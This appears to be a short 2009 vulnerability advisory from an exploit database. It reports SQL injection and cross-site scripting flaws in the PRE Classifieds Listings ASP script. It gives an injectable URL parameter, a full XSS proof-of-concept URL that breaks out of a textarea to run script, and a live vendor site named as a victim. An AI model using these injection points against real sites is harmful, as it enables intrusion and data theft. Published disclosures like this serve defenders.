PRE Classifieds Listings SQL,XSS

2009-08-04 / 2009-08-05
Credit: Pouya_Server
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

######################################################### --------------------------------------------------------- Portal Name: PRE Classifieds Listings Vendor : http://www.preproject.com/ Author : Pouya_Server , Pouya.s3rver@Gmail.com Vulnerability : (SQL,XSS) --------------------------------------------------------- ######################################################### [SQL]: http://site.com/[Path]/home/detailad.asp?siteid=[SQL] [XSS]: http://site.com/[Path]/home/signup.asp?full_name=pouya.s3rver@gmail.com&email=111-222-1933email@address.tst&pass=111-222-1933email@address.tst&address=</textarea><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&phone=111-222-1933email@address.com&state=0&hide_email=on&url_add=111-222-1933email@address.tst&Submit=SignUp&addit=start --------------------------------- Victem : http://preproject.com/pclasp/

References:

http://xforce.iss.net/xforce/xfdb/47006
http://www.securityfocus.com/bid/32566
http://packetstormsecurity.org/0812-exploits/preclass-sqlxss.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top